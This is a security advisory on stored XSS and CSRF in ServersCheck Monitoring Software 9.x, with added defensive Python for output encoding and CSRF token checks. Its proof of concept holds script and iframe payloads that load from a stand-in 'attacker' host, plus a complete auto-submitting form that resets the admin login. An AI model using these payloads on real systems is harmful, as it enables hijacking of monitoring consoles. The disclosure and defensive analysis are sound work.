ServersCheck Monitoring Software Script Insertion Vulnerability

Release date: 2012-10-12
Updated: 2012-10-16

Affected systems:
ServersCheck Monitoring Software 9.x
Description:
--------------------------------------------------------------------------------
ServersCheck Monitoring Software is network and server monitoring software.

ServersCheck Monitoring Software contains a security vulnerability: input passed via the "syslocation" and "syscontact" parameters is displayed to users without proper filtering, which can be exploited to insert arbitrary HTML and script code.
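The fix for this class of bug is output encoding at the point where the SNMP-derived values reach the page, plus a scan of polled values so that markup in a sysLocation or sysContact string is noticed rather than rendered. The example below is added here and is not code from the advisory or from ServersCheck; the function names and the sample values (the two payload strings quoted in this advisory plus one benign string) are constructed for illustration.

```python
import html
import re

# Constructed sample values: the two payload strings from the advisory and one
# benign string that legitimately contains quotes and an ampersand.
SAMPLE_VALUES = {
    "syslocation": '<script src="http://attacker/xss.js"></script>',
    "syscontact": '<iframe src="http://attacker/scheck-csrf.html"></iframe>',
    "sysname": 'Rack 3 "east" & west',
}

# A free-text SNMP field only ever needs to hold a location or a contact name,
# so anything that opens an HTML tag is worth flagging on the detection side.
TAG_OPENER_RE = re.compile(r"<[a-zA-Z/!]")


def contains_markup(value: str) -> bool:
    """Detection helper: True if an SNMP text field carries an HTML tag opener."""
    return TAG_OPENER_RE.search(value) is not None


def escape_field(value: str) -> str:
    """Output-encode a value for an HTML text or attribute context.

    quote=True also encodes " and ' so the result is safe inside attributes,
    not just between tags."""
    return html.escape(value, quote=True)


def render_system_info(syslocation: str, syscontact: str) -> str:
    """Build the dashboard fragment with every SNMP-derived value encoded
    at the moment it is written into the markup (hypothetical renderer)."""
    return (
        "<table>"
        f"<tr><th>sysLocation</th><td>{escape_field(syslocation)}</td></tr>"
        f"<tr><th>sysContact</th><td>{escape_field(syscontact)}</td></tr>"
        "</table>"
    )


def scan_fields(fields: dict) -> list:
    """Return the names of fields that contain markup; run this over polled
    SNMP system values (or an snmpd.conf) to flag entries that should never
    reach a page unencoded."""
    return [name for name, value in fields.items() if contains_markup(value)]


if __name__ == "__main__":
    print("flagged:", scan_fields(SAMPLE_VALUES))
    print(render_system_info(SAMPLE_VALUES["syslocation"], SAMPLE_VALUES["syscontact"]))
```

Encoding, not filtering, is the right control here: the benign `sysname` value survives intact as `Rack 3 &quot;east&quot; &amp; west`, while both payload strings render as literal text with no `<script` or `<iframe` left for the browser to act on.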

<*Source: loneferret
 
  Links: http://secunia.com/advisories/50959/
        http://www.exploit-db.com/exploits/21866/
*>

Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided for security research and educational purposes only. Use at your own risk!

# PoC:
# Store XSS & Cross Site Request Forgery
# The XSS is triggered by configuring a snmpd.conf file to point to an attacker-controlled
# JavaScript file.
# ..
# syslocation <script src="http://attacker/xss.js"></script>
# syscontact <iframe src="http://attacker/scheck-csrf.html"></iframe>

# CSRF PoC:
# We can also use the previous XSS to trigger this. Makes for a funny.
# Change Admin credentials
# File scheck-csrf.html
<html>
<body onload="trigger()">
<script>
        function trigger() {
                document.getElementById('bad_form').submit();
        }
</script>
<form id="bad_form" method="post" action="http://target:1272/settings2.html">
  <input name="systemsetting" value="secure" type="hidden">
  <input name="setting" value="SECURE" type="hidden">
  <input value="ok" name="changedsettings" type="hidden">
  <input name="systemsetting" value="SECURE" type="hidden">
  <input name="XYXadminuser" size="30" value="loneferret" type="hidden"><br>
  <input name="adminpass" size="30" value="123456" type="hidden"><br>
</form>
</body>
</html>
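The forged form above works because settings2.html accepts a POST from any origin with nothing in it that an attacker's page could not already know. The server-side check below is an added example, not ServersCheck code: it models the request as plain dictionaries, requires the Origin (or Referer) to match the application's own scheme, host and port, and requires a per-session token that the legitimate settings page would carry in a hidden field. The function names, the session store and the constructed request values are assumptions for illustration; `http://target:1272/settings2.html` is the endpoint named in the PoC.

```python
import hmac
import secrets
from urllib.parse import urlparse

# The settings endpoint named in the advisory's PoC form.
SETTINGS_URL = "http://target:1272/settings2.html"


def issue_csrf_token(session: dict) -> str:
    """Mint a per-session token and store it server-side. The genuine settings
    form echoes it back in a hidden field; a page on another origin cannot
    read it, so it cannot be included in a forged POST."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token


def same_origin(headers: dict, expected_url: str) -> bool:
    """Origin, falling back to Referer, must match the app's own origin exactly."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    got, want = urlparse(source), urlparse(expected_url)
    return (got.scheme, got.hostname, got.port) == (want.scheme, want.hostname, want.port)


def validate_settings_post(headers: dict, form: dict, session: dict) -> tuple:
    """Return (accepted, reason) for a POST aimed at settings2.html.

    Both checks are applied: the origin check defeats a cross-site form
    submission, the token check defeats a same-origin injection that could
    spoof the Origin header (for instance the stored XSS in this advisory)."""
    if not same_origin(headers, SETTINGS_URL):
        return False, "origin mismatch"
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return False, "missing or invalid csrf token"
    return True, "ok"


# Constructed request modelled on scheck-csrf.html: the victim's browser would
# send Origin: http://attacker and the form fields from the PoC, but no token.
FORGED_HEADERS = {"Origin": "http://attacker"}
FORGED_FORM = {"XYXadminuser": "loneferret", "adminpass": "123456", "changedsettings": "ok"}


def demo() -> tuple:
    """Run the forged request and a genuine one through the same check."""
    session = {}
    token = issue_csrf_token(session)
    forged = validate_settings_post(FORGED_HEADERS, FORGED_FORM, session)
    genuine = validate_settings_post(
        {"Origin": "http://target:1272"},
        {"changedsettings": "ok", "csrf_token": token},
        session,
    )
    return forged, genuine


if __name__ == "__main__":
    print(demo())
```

Because the advisory chains the stored XSS into the CSRF, the origin check alone would not be enough: script already running on the application's origin submits with a matching Origin header. The token is what closes that path, and `hmac.compare_digest` keeps the comparison constant-time.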

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

ServersCheck Monitoring Software
--------------------------------
The vendor has released an upgrade patch that fixes this security issue; please download it from the vendor's homepage:

http://www.serverscheck.dk/monitoring_software/release.asp
